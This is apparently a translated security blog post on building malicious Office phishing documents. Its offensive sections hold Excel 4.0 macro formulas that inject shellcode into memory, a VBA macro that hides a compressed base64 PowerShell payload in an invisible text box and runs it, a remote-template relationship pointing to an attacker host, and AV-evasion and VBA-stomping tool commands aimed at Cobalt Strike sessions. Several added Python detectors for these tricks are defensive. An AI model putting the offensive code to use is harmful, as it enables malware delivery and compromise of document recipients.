Original | Phishing documents revisited

I have written about phishing documents before; this is another quick piece on the topic that I hope will be of some use.


1. XLM Macro (Excel 4.0)


Unlike ordinary Office macros, these use the XLM (Excel 4.0 macro) format, which is not to be confused with XML. XLM dates from 1992, well before VBA.

[screenshot]

Let's look at a simple demo:

[screenshot]

This technique was publicised in 2018 in this post:
https://outflank.nl/blog/2018/10/06/old-school-evil-excel-4-0-macros-xlm/

A number of related projects grew out of it,

for example Excel4-DCOM (https://github.com/outflanknl/Excel4-DCOM):
Invoke-Excel4DCOM -ComputerName server01 -Payload C:\temp\payload.bin

It too relies on XLM calling Win32 APIs to perform remote thread injection.

SharpShooter: https://github.com/mdsecactivebreach/SharpShooter

An XLS macro is created with this tool as follows:

SharpShooter.py --payload slk --output foo --rawscfile ~./x86payload.bin --smuggle --template mcafee

The generated SLK file looks like this:

[screenshot]

The principle is basically the same. All of these are x86-based, however; x64 has some problems, which this article (https://www.cybereason.com/blog/excel4.0-macros-now-with-twice-the-bits) describes.

A later tool:
https://gist.github.com/Philts/f7c85995c5198e845c70cc51cd4e7e2a
It uses QueueUserAPC for injection on x64.
There are of course many other related tools
(Macrome: https://github.com/michaelweber/Macrome, EXCELntDonut: https://github.com/FortyNorthSecurity/EXCELntDonut), and so on.

Process injection

Since XLS supports Win32 calls, we can carry out process injection and similar operations. The call takes the form:
REGISTER(module_name, procedure_name, type, alias, argument, macro_type, category)

[screenshot]

Note that x86 and x64 have to be handled differently. The x86 demo (one formula per cell):
=REGISTER("Kernel32","VirtualAlloc","JJJJJ","Valloc",,1,9)
=REGISTER("Kernel32","WriteProcessMemory","JJJCJJ","WProcessMemory",,1,9)
=REGISTER("Kernel32","CreateThread","JJJJJJJ","CThread",,1,9)
=Valloc(0,65536,4096,64)
=SELECT(B1:B999,B1)
=SET.VALUE(D1,0)
=WHILE(ACTIVE.CELL()<>"excel")
=SET.VALUE(D2,LEN(ACTIVE.CELL()))
=WProcessMemory(-1,A10+(D1*255),ACTIVE.CELL(),LEN(ACTIVE.CELL()),0)
=SET.VALUE(D1,D1+1)
=SELECT(,"R[1]C")
=NEXT()
=CThread(0,0,A10,0,0,0)
=HALT()

The x64 demo (one formula per cell):
=REGISTER("Kernel32","VirtualAlloc","JJJJJ","Valloc",,1,9)
=REGISTER("Kernel32","RtlCopyMemory","JJCJ","RTL",,1,9)
=REGISTER("Kernel32","QueueUserAPC","JJJJ","Queue",,1,9)
=REGISTER("ntdll","NtTestAlert","J","Go",,1,9)
=WHILE(A22=0)
=SET.VALUE(A22,Valloc(A21,65536,12288,64))
=SET.VALUE(A21,A21+262144)
=NEXT()
=REGISTER("Kernel32","RtlCopyMemory","JJCJ","RTL",,1,9)
=REGISTER("Kernel32","QueueUserAPC","JJJJ","Queue",,1,9)
=REGISTER("ntdll","NtTestAlert","J","Go",,1,9)
=SELECT(C1:C3479,C1)
=SET.VALUE(D1,0)
=WHILE(ACTIVE.CELL()<>"EXCEL")
=SET.VALUE(D2,LEN(ACTIVE.CELL()))
=RTL(A22+(D1*10),ACTIVE.CELL(),LEN(ACTIVE.CELL()))
=SET.VALUE(D1,D1+1)
=SELECT(,"R[1]C")
=NEXT()
=Queue(A22,-2,0)
=Go()
=SET.VALUE(A22,0)
=HALT()

For convenience I generate it directly with EXCELntDonut. Generate the shellcode with Cs (Cobalt Strike) and substitute it at the indicated place:

[screenshot]

Then run:
EXCELntDonut -f exe_source.cs -r System.Windows.Forms.dll

[screenshot]

Then insert the data and process it:

[screenshot]

[screenshot]

Then execute. Unfortunately my test kept failing.

[screenshot]

Evasion

An equivalent formulation with the same effect:

[screenshot]

Hiding the macro sheet

Per the MS-XLS specification (https://docs.microsoft.com/en-us/openspecs/office_file_formats/ms-xls/b9ec509a-235d-424e-871d-f8e721106501):

[screenshot]

change the sheet-state value to 02 (the "very hidden" state):

[screenshot]

The sheet can now no longer be unhidden from the Excel UI:

[screenshot]
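From the defensive side, the "very hidden" state is still plainly visible in the file structure even though Excel's UI no longer offers to unhide the sheet. The following added example (my own code, not from the page or from any of the tools it mentions) walks the BIFF8 record stream of a Workbook stream, decodes every BoundSheet8 record, and reports Excel 4.0 macro sheets whose state is hidden or very hidden. It assumes the Workbook stream has already been extracted from the OLE compound file (for example with olefile); the sample stream, its BOF contents and the sheet names are constructed inline.

```python
import struct

# BIFF8 record types used here (MS-XLS)
RT_BOF = 0x0809
RT_EOF = 0x000A
RT_BOUNDSHEET8 = 0x0085

# BoundSheet8.dt (sheet type) and BoundSheet8.hsState (visibility) values, per MS-XLS
SHEET_TYPE = {0x00: "worksheet", 0x01: "macro sheet", 0x02: "chart", 0x06: "VBA module"}
SHEET_STATE = {0x00: "visible", 0x01: "hidden", 0x02: "very hidden"}


def iter_records(stream: bytes):
    """Yield (record_type, payload) for every BIFF record in a Workbook stream."""
    pos = 0
    while pos + 4 <= len(stream):
        rt, cb = struct.unpack_from("<HH", stream, pos)
        payload = stream[pos + 4 : pos + 4 + cb]
        if len(payload) != cb:
            raise ValueError(f"truncated record 0x{rt:04X} at offset {pos}")
        yield rt, payload
        pos += 4 + cb


def parse_boundsheet8(payload: bytes) -> dict:
    """Decode a BoundSheet8 record: stream offset, visibility, sheet type and name."""
    lb_ply_pos, grbit = struct.unpack_from("<IH", payload, 0)
    hs_state = grbit & 0x03          # low two bits of the first flag byte: hsState
    dt = (grbit >> 8) & 0xFF         # second flag byte: sheet type
    cch, flags = payload[6], payload[7]
    if flags & 0x01:                 # fHighByte set: name stored as UTF-16LE
        name = payload[8 : 8 + 2 * cch].decode("utf-16-le")
    else:
        name = payload[8 : 8 + cch].decode("latin-1")
    return {
        "name": name,
        "offset": lb_ply_pos,
        "type": SHEET_TYPE.get(dt, f"unknown(0x{dt:02X})"),
        "state": SHEET_STATE.get(hs_state, f"unknown({hs_state})"),
    }


def list_sheets(stream: bytes) -> list:
    return [parse_boundsheet8(p) for rt, p in iter_records(stream) if rt == RT_BOUNDSHEET8]


def hidden_macro_sheets(stream: bytes) -> list:
    """Macro sheets a user would never see in Excel: the classic XLM hiding pattern."""
    return [s for s in list_sheets(stream) if s["type"] == "macro sheet" and s["state"] != "visible"]


# --- constructed sample Workbook stream (not a real file) ---------------------------
def _record(rt: int, payload: bytes) -> bytes:
    return struct.pack("<HH", rt, len(payload)) + payload


def _boundsheet8(name: str, dt: int, hs_state: int, ply_pos: int = 0) -> bytes:
    raw = name.encode("latin-1")
    return struct.pack("<IHBB", ply_pos, (dt << 8) | hs_state, len(raw), 0x00) + raw


SAMPLE_STREAM = (
    _record(RT_BOF, struct.pack("<HHHHII", 0x0600, 0x0005, 0, 0, 0, 0))  # BIFF8 workbook-globals BOF
    + _record(RT_BOUNDSHEET8, _boundsheet8("Sheet1", dt=0x00, hs_state=0x00))
    + _record(RT_BOUNDSHEET8, _boundsheet8("Macro1", dt=0x01, hs_state=0x02))  # the hidden XLM sheet
    + _record(RT_EOF, b"")
)

if __name__ == "__main__":
    for sheet in list_sheets(SAMPLE_STREAM):
        print(sheet)
    for sheet in hidden_macro_sheets(SAMPLE_STREAM):
        print(f"ALERT: {sheet['state']} macro sheet {sheet['name']!r} at stream offset {sheet['offset']}")
```

A very hidden sheet is legitimate in some templates, so the useful signal is the combination: a macro sheet (dt = 01) that is also hidden, ideally cross-checked with an Auto_Open defined name pointing into it.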

EPPlus: EPPlus 5 - Excel spreadsheets for .NET

EPPlus is a .NET library for generating Excel files: https://github.com/EPPlusSoftware/EPPlus

With it one can produce an Excel file that evades AV; demo: https://github.com/FortyNorthSecurity/hot-manchego

Usage:
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /reference:EPPlus.dll hot-manchego.cs
hot-manchego.exe blank.xlsm vba.txt

Run the macro and a Cs session comes in.

[screenshot]

2. PowerPoint


This attack instead relies on mouse actions such as clicking or hovering. The steps are as follows:

[screenshot]

Insert the HTA generated by Cs. On click,

[screenshot]

the Cs session comes in.

3. Remote document loading



Every document is a zip file. Extract it and edit the relationship entry

[screenshot]

to read:

<Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/attachedTemplate" Target="http://192.168.1.106/1.dotm" TargetMode="External"/>

Now, when the document is opened and the macro runs, the session comes in.
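Both the PowerPoint trick in section 2 and the remote template in section 3 leave a static trace in the OOXML package: a relationship whose target lies outside the zip (TargetMode="External"), and for PowerPoint a click or hover action of the form ppaction://program that resolves to that external target. The following added example (my own code, not from the page or from Cs) scans a package for both. The minimal docx and pptx samples, the host attacker.example and the .hta path are constructed for the demonstration and are not real files or indicators.

```python
import io
import posixpath
import zipfile
import xml.etree.ElementTree as ET

NS_PKG = "http://schemas.openxmlformats.org/package/2006/relationships"
NS_A = "http://schemas.openxmlformats.org/drawingml/2006/main"
NS_R = "http://schemas.openxmlformats.org/officeDocument/2006/relationships"

# ppaction:// verbs that launch something rather than navigate within the deck
PPACTION_EXEC = ("ppaction://program", "ppaction://macro")


def _rels_path(part: str) -> str:
    """word/settings.xml -> word/_rels/settings.xml.rels"""
    folder, name = posixpath.split(part)
    return posixpath.join(folder, "_rels", name + ".rels")


def _load_rels(zf: zipfile.ZipFile, rels_name: str) -> list:
    root = ET.fromstring(zf.read(rels_name))
    return [
        {
            "part": rels_name,
            "id": rel.get("Id"),
            "type": (rel.get("Type") or "").rsplit("/", 1)[-1],
            "target": rel.get("Target"),
            "external": rel.get("TargetMode") == "External",
        }
        for rel in root.iter(f"{{{NS_PKG}}}Relationship")
    ]


def external_relationships(zf: zipfile.ZipFile) -> list:
    """Every relationship whose target lies outside the package (remote templates, links, ...)."""
    found = []
    for name in zf.namelist():
        if name.endswith(".rels"):
            found.extend(r for r in _load_rels(zf, name) if r["external"])
    return found


def ppaction_triggers(zf: zipfile.ZipFile) -> list:
    """Click/hover actions on PowerPoint slides that run a program or macro."""
    found = []
    for name in zf.namelist():
        if not (name.startswith("ppt/slides/") and name.endswith(".xml")):
            continue
        rels_name = _rels_path(name)
        targets = {}
        if rels_name in zf.namelist():
            targets = {r["id"]: r["target"] for r in _load_rels(zf, rels_name)}
        root = ET.fromstring(zf.read(name))
        for trigger in ("hlinkClick", "hlinkHover"):
            for el in root.iter(f"{{{NS_A}}}{trigger}"):
                action = el.get("action") or ""
                if action.startswith(PPACTION_EXEC):
                    found.append({"slide": name, "trigger": trigger, "action": action,
                                  "target": targets.get(el.get(f"{{{NS_R}}}id"))})
    return found


def scan_office_package(data: bytes) -> dict:
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        return {"external": external_relationships(zf), "ppaction": ppaction_triggers(zf)}


# --- constructed samples: minimal packages, not real Office files -------------------
def _package(parts: dict) -> bytes:
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for name, xml in parts.items():
            zf.writestr(name, xml)
    return buf.getvalue()


DOCX_REMOTE_TEMPLATE = _package({
    "word/_rels/settings.xml.rels":
        f'<Relationships xmlns="{NS_PKG}">'
        '<Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/attachedTemplate" '
        'Target="http://attacker.example/1.dotm" TargetMode="External"/></Relationships>',
})

PPTX_HOVER_PROGRAM = _package({
    "ppt/slides/_rels/slide1.xml.rels":
        f'<Relationships xmlns="{NS_PKG}">'
        '<Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" '
        'Target="file:///C:/Users/Public/sample.hta" TargetMode="External"/></Relationships>',
    "ppt/slides/slide1.xml":
        f'<p:sld xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main" xmlns:a="{NS_A}" xmlns:r="{NS_R}">'
        '<p:cSld><p:spTree><p:sp><p:nvSpPr><p:cNvPr id="2" name="Box">'
        '<a:hlinkHover r:id="rId2" action="ppaction://program"/>'
        '</p:cNvPr></p:nvSpPr></p:sp></p:spTree></p:cSld></p:sld>',
})

if __name__ == "__main__":
    for label, pkg in (("docx", DOCX_REMOTE_TEMPLATE), ("pptx", PPTX_HOVER_PROGRAM)):
        print(label, scan_office_package(pkg))
```

An external attachedTemplate relationship is exactly what a mail gateway or sandbox should block or detonate, since the document itself carries no macro; for PowerPoint the hover trigger is the one to watch, because it fires without a click.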


4. Controls


Sub Main()
On Error Resume Next
createTextBoxs
ExecuteTextBoxCommands
End Sub

Sub createTextBoxs()
On Error Resume Next
Dim objTextBox As Shape
Dim secretkey As Long
Dim str As String
Dim zHf As String
Dim payload As String
payload = "H4sIAAAAAAAAAK1WaW/iShb9nPwKf4gEKCQBs4U3ivQAYzDGxmA2kxdFZbuAMuWtvGDzpv/7lA2k09PpmZZmkJCr7LycOnepq8Lw"
payload = payload + "QQ0JMkLJNSHzsIQkQK7DsLe328gxwmydLd53MHz3iGu8A9MkMAiYv29vFECAzRTvYkDebdeMMCwz+SYThGZEYOnm5vYmfxU5AdjC"
payload = payload + "dweEKIbvNgz3rhkwL0zxteN5nGsD5Lz98UcvIgQ64Xn/OIBhJwigrWMEg2KJ+Sez2kMCHya6BY2Q+Zu5e38cYFcH+CKW9oCxp6fo"
payload = payload + "OGb2bewaIDvBo+phFBYLf/1VKL0+VN8e+34EcFAsqGkQQvvRxLhQYr6VMofz1IPFgoQM4gbuNnxcIafGPi5y9HIOXjpjL5QuJ9t5"
payload = payload + "gJ7j14fMrJ51igW6VCg3nTOHhTLzmvl7fXtj/vxAM4ucENnwUXBCSFxPhSRGBgweh8AxMZzBLVUrBDRmzq5QoiAIDCPiMFcsVC92"
payload = payload + "D7B450QYl6nd19+1+1aU4fFK7u8qFT8rUSklJKXyJSd+hw4pz5uzOXqcn9B/Sq4S/f2UYKXbb1+lqgkx3IEQvoeU30+5entz85ov"
payload = payload + "IT1PUXEDlOu9MJUyI1EQIHRJmoVzTiJYevsen7Pbq2ZQ/qWh6lXronMOzxnHC/O6dJH5dntTur1kT/b+XY8QNiHJvv+6Gji4RQ7k"
payload = payload + "UgfYyLgmfPGrmMEthjkfj1cxmeIsFi4foMld2ClkhL7+rNa3Ufih2z2D6xg07gFFRVOi9COYcwyLBcGRoE35O+9pmt5taZnBq/Sl"
payload = payload + "tNKr92yf5XIPgyAoM0pE69woMyoEGJplpuME6PKpE4Vuvix8hytFOEQGCMKrubfSF5ReXPdch1ZMZNDoUhrmqgcNBHDGSpkZIhN2"
payload = payload + "UxXtrhAKX3LSAxjTkqOWYhoT+ibjQg2znCFm+d/zo/SowlCwPQxtKp13IR6DHe05l4rK0w3soFn4D7CvdXIuioyrK0mfQNMEULEb"
payload = payload + "lpklIiHta4XyT4n3v8H7scX8ALNH4CWQxbwQhS1t6OcuQNkJ0Ik2Y+gzz6WsBF+7aZjVUm7GyK6blw+ic1pJSJV44tpdEMBmXc17"
payload = payload + "XLFQY6Nd0lbGzVSyBHaUao6cGM6S9GN+AJr7ZMpGrjEPiT/sc3Q/M9ggwAPs6fuxD5KxZSXt3jrtKx12jJqogYRo3D05PDJsqjed"
payload = payload + "uNqsTYRY5l0ctMQev1oAZPm5r8iuV80+SMcno7knExa62lH2hVjpmKvYaNqiyzdDqruM+pFH+tFE0aKxP7YFVN/H3DIcxcLgeSiy"
payload = payload + "GnjGegvm+qaf+dL8XQyy/amd7ZHfgyTzo1H2Ya3ahKtRS3M8BFfR7nSUkWGeOMiO6PvIlQwvqMknY3s4WMCrLtRDVZwvNmvKTRX4"
payload = payload + "hNebRNU8HC87i0NN2ZAcW8xTjHKGExns6KR5h4259Ps1RRcWQ0z8aITsp2kqpBcZe5Sqapc+xY0p+s8N88SmQ68OmgRRThPqp5Xx"
payload = payload + "aywCS1hNHGPNI9vYs9zMMtp25Dco7vpQHonrhPjhiPgx9hsTxchw53qZ/LSOJ1Uq7+vWWAT3ApIs0D4FYxHG2TpVODFJBUt4jrqZ"
payload = payload + "HjdIsL48WF61Dpsjh8XTNteWoCfaUjxTm7Mu6K6T+27aHyxUMx0kHW4trp86+nbnBq2DI3X1eijMOi2LsLzJpz01RYcnvD7E7Hij"
payload = payload + "zPGgsmhMogrkYCqzi/5mxtmj/uxQXQ+mcjTnsTivtHtcV5P7R2k87SeTRWW0Vg+8MtvvON3p+pudBLiZpHVqMxoPU1ryHU5fGxw/"
payload = payload + "raiDjlxbLLxhZu9sw41EVe6tZ5u+IE3WvV2j20Lb0xPeWa1D41CVN+0F2R21mWDp3hYE7BE1gHrfirzOXN427bm7ZTdNQYOVJQSg"
payload = payload + "eqqAlup3dhOzJ676+/V4IdaaRnP69BwYadVSWEGdP8faUF7K4ux5GRw30ugETZ+7r7DcWtr5glLbhEHYqlYPykwTLHmkVO6TrZxU"
payload = payload + "HWEyu190h9I8iWuidtQAqVQr3LY+8AbcsO1BzK0XVb/fdNd7rr6vI3u8DFvjCm0fdrNXc+yFtnna1FyV666D8XxUG+0loOimtrfm"
payload = payload + "aNDg96fB0FdOvUa9Fh/1+kpqrCSho1U7w+kgGdvyuj4YidOBYGlebY5dvnrOaX9Dc5XWqKgLp6xWRaDlNStuYN08JuGJBa3u0RhE"
payload = payload + "fkL/FZqT9ysqe8xkfJ+leS3pK/9I8xo0OafT1K1lY8n7vRkRoh6te70Ca2ELpJolULvGPTeO5ZZR6wqgT+PJzwK5v6uo/WRhGcg3"
payload = payload + "5ruXl7xVbl1Cp58kmyj+wdDnAw6Zj4ZH2xxtr9n7+/u8Jd58fHq9S96uY+TH/kFPqLla4/bm23VeiMGnrvmr6UwCJNgDTLspnbCu"
payload = payload + "9yPvEv4yJykuyjSKxa9H+wMkDsR07KWD8fVW6WDsGtlk94sR68+Pvk9vzwVd1tgvV6XvF0SpdL369Gi7zcefyxGvU+D3q2RDz1f+"
payload = payload + "ROQYOrtwX2YqSa1SqWTPeoVa+31ieq6XFj/slbP57xOUz65w7upjYCORY8P/Ywx+8Prf2c34y2fI7+zliL6mLLuU/wU5qB694w0A"
payload = payload + "AA=="
zHf = " -NoP -NonI -Command ""Invoke-"
zHf = zHf + "Expression $(New-Object IO.StreamReader ($(New-O"
zHf = zHf + "bject IO.Compression.DeflateStream ($(New-Object"
zHf = zHf + " IO.MemoryStream (,$([Convert]::FromBase64String"
zHf = zHf + "("" " & payload & " "" )))), [IO.Compression.Compr"
zHf = zHf + "essionMode]::Decompress)), [Text.Encoding]::ASCI"
zHf = zHf + "I)).ReadToEnd();Read-Host;"""
secretkey = RGB(1, 33, 7)
Debug.Print "Adding Embedded Command Shape Into Document"
Set objTextBox = ActiveDocument.Shapes.AddTextbox(msoTextOrientationHorizontal, 0, 0, 0, 0)
With objTextBox
    .TextFrame.TextRange.Text = "powershell.exe|" + zHf + "|open|1"
    .Name = "Shell.Application"
    .Height = 1
    .Width = 1
    .Visible = msoFalse
    .Shadow.Visible = True
    .Shadow.ForeColor.RGB = secretkey
    If .Shadow.ForeColor.RGB <> secretkey Then
        Debug.Print "Fail to set secret key"
    End If
    Debug.Print "Secret Key For Command Shape: " & CStr(.Shadow.ForeColor.RGB)
    .AlternativeText = "ShellExecute"
    .TextFrame.TextRange.Font.TextColor.RGB = ActiveDocument.Background.Fill.BackColor
End With
End Sub

Sub ExecuteTextBoxCommands()
On Error Resume Next
Dim objCmdShape As Shape
Dim secretkey As Long
Dim cmdParams() As String
Dim cmdCommand As String
Dim cmdType As String
Dim cmdObj As Object
secretkey = RGB(1, 33, 7)
For x = 1 To ActiveDocument.Shapes.Count
    Set objCmdShape = ActiveDocument.Shapes(x)
    If objCmdShape.Shadow.ForeColor.RGB = secretkey Then
        Debug.Print "Discovered Command Text Object"
        cmdType = objCmdShape.Name
        cmdCommand = objCmdShape.AlternativeText
        cmdParams = Split(objCmdShape.TextFrame.TextRange.Text, "|")
        Debug.Print "Command Type To Execute: " & cmdType
        Debug.Print "Command To Execute: " & cmdCommand
        Debug.Print "Command Params to Execute: " & Join(cmdParams, " & ")
        Set cmdObj = Interaction.CreateObject(cmdType)
        VBA$.[Interaction].CallByName! cmdObj, [cmdCommand], VbMethod, cmdParams(0), cmdParams(1), cmdParams(2)
        objCmdShape.Delete
        ActiveDocument.Save
        Exit For
    End If
Next
End Sub

There is nothing especially magical about this technique: the macro creates an invisible control and then invokes it to execute the malicious code. The code above cannot be used as-is; the PowerShell part has to be changed, and I leave completing it to the reader.

5. VBA Stomping



Translated literally, "VBA trampling". How should we understand it? Say we create some basic VBA code:

[screenshot]

When we unzip the document and overwrite it with zeros, it still executes, like this:

[screenshot]

changed to:

[screenshot]

and it still works.

Weaponised: https://github.com/outflanknl/EvilClippy

Build command:
csc /reference:OpenMcdf.dll,System.IO.Compression.FileSystem.dll /out:EvilClippy.exe *.cs

[screenshot]

Usage:
EvilClippy.exe -s fakecode.vba -t 2016x86 macrofile.doc

This gives you a processed document.
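Stomping works because Office runs the compiled p-code in the module stream whenever the version stamp in the _VBA_PROJECT stream matches the Office build that compiled it, and only recompiles from the compressed source text when it does not; the source that analysts and most AV engines read can therefore be blank or fake while the p-code does the real work (hence the -t 2016x86 target above). The following added example (my own code, not from the page, EvilClippy or oletools) decodes the MS-OVBA 2.4.1 compressed source section of a module stream and applies two checks: it flags modules whose source is unreadable or contains only Attribute lines (the stomping case from this section), and it lists keywords typical of the hidden-shape and CallByName pattern from section 4. It assumes the caller has already located the module stream inside vbaProject.bin and its MODULEOFFSET (for example with olefile); all inputs are constructed inline, and the hand-encoded container is my own encoding of a two-line stub. Comparing non-empty source against the p-code itself (as pcodedmp does) is out of scope here.

```python
import re
import struct

# Keywords in decompressed VBA source worth a second look (hidden shape + CallByName pattern)
SUSPICIOUS = (
    ("CreateObject", re.compile(rb"\bCreateObject\b", re.I)),
    ("CallByName", re.compile(rb"\bCallByName\b", re.I)),
    ("Shell", re.compile(rb"\bShell\b", re.I)),
    ("hidden shape", re.compile(rb"\bAddTextbox\b|\.Visible\s*=\s*msoFalse", re.I)),
    ("powershell", re.compile(rb"powershell", re.I)),
)
ATTRIBUTE_LINE = re.compile(rb"^\s*Attribute\s", re.I)


def decompress_vba_source(container: bytes) -> bytes:
    """Decode an MS-OVBA 2.4.1 compressed container (module source code) back to text."""
    if not container or container[0] != 0x01:
        raise ValueError("missing 0x01 signature byte: not a compressed container")
    out = bytearray()
    pos = 1
    while pos + 2 <= len(container):
        header = struct.unpack_from("<H", container, pos)[0]
        chunk_size = (header & 0x0FFF) + 3
        if (header >> 12) & 0x07 != 0b011:
            raise ValueError(f"bad chunk signature at offset {pos}")
        compressed = bool(header & 0x8000)
        end = min(len(container), pos + chunk_size)
        pos += 2
        chunk_start = len(out)
        if not compressed:                      # raw chunk: 4096 bytes copied as-is
            out += container[pos:pos + 4096]
            pos += 4096
            continue
        while pos < end:
            flags = container[pos]              # one flag bit per following token, LSB first
            pos += 1
            for bit in range(8):
                if pos >= end:
                    break
                if not (flags >> bit) & 1:      # literal token: a single byte
                    out.append(container[pos])
                    pos += 1
                    continue
                token = struct.unpack_from("<H", container, pos)[0]   # copy token
                pos += 2
                distance = len(out) - chunk_start
                bit_count = max((distance - 1).bit_length(), 4)       # ceil(log2(distance)), min 4
                length = (token & (0xFFFF >> bit_count)) + 3
                offset = (token >> (16 - bit_count)) + 1
                src = len(out) - offset
                if src < chunk_start:
                    raise ValueError(f"copy token reaches before chunk start at offset {pos - 2}")
                for i in range(length):         # byte-wise copy: source may overlap the output
                    out.append(out[src + i])
    return bytes(out)


def has_executable_source(source: bytes) -> bool:
    return any(line.strip() and not ATTRIBUTE_LINE.match(line) for line in source.splitlines())


def suspicious_calls(source: bytes) -> list:
    return [label for label, rx in SUSPICIOUS if rx.search(source)]


def inspect_module_source(container: bytes) -> dict:
    """Stomping heuristics for one module stream's source section (the bytes at MODULEOFFSET)."""
    try:
        source = decompress_vba_source(container)
    except ValueError as exc:
        return {"source": None, "stomping_suspected": True, "reason": str(exc), "suspicious": []}
    if not has_executable_source(source):
        return {"source": source, "stomping_suspected": True,
                "reason": "attribute lines only: source removed, p-code may still run", "suspicious": []}
    return {"source": source, "stomping_suspected": False, "reason": "", "suspicious": suspicious_calls(source)}


# --- constructed inputs ----------------------------------------------------------------
def compress_literal_only(data: bytes) -> bytes:
    """Valid but naive MS-OVBA encoding (literal tokens only); used here to build test containers."""
    assert 0 < len(data) <= 4096
    body = bytearray()
    for i in range(0, len(data), 8):
        body.append(0x00)                       # flag byte: all eight tokens are literals
        body += data[i:i + 8]
    header = 0x8000 | 0x3000 | (len(body) + 2 - 3)
    return b"\x01" + struct.pack("<H", header) + bytes(body)


# Hand-encoded container with one copy token: the trailing "Sub" re-uses the first three bytes
HAND_ENCODED = (b"\x01\x14\xb0" + b"\x00" + b"Sub Go()" + b"\x40" + b"\r\nEnd " + b"\x00\xd0" + b"\r"
                + b"\x00" + b"\n")
STOMPED_MODULE = compress_literal_only(b'Attribute VB_Name = "Module1"\r\n')
ZERO_FILLED = b"\x00" * 32

if __name__ == "__main__":
    for label, blob in (("hand-encoded", HAND_ENCODED), ("stomped", STOMPED_MODULE), ("zeroed", ZERO_FILLED)):
        print(label, inspect_module_source(blob))
```

In practice the "attribute lines only" case is the strong signal: a module that Office will happily run from p-code but whose source shows nothing is not something a legitimate authoring tool produces.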

The above has introduced some common phishing-document techniques; I hope they are of use. Used in combination they are even more effective.

This article was first published on the WeChat official account SecIN技术平台: Original | Phishing documents revisited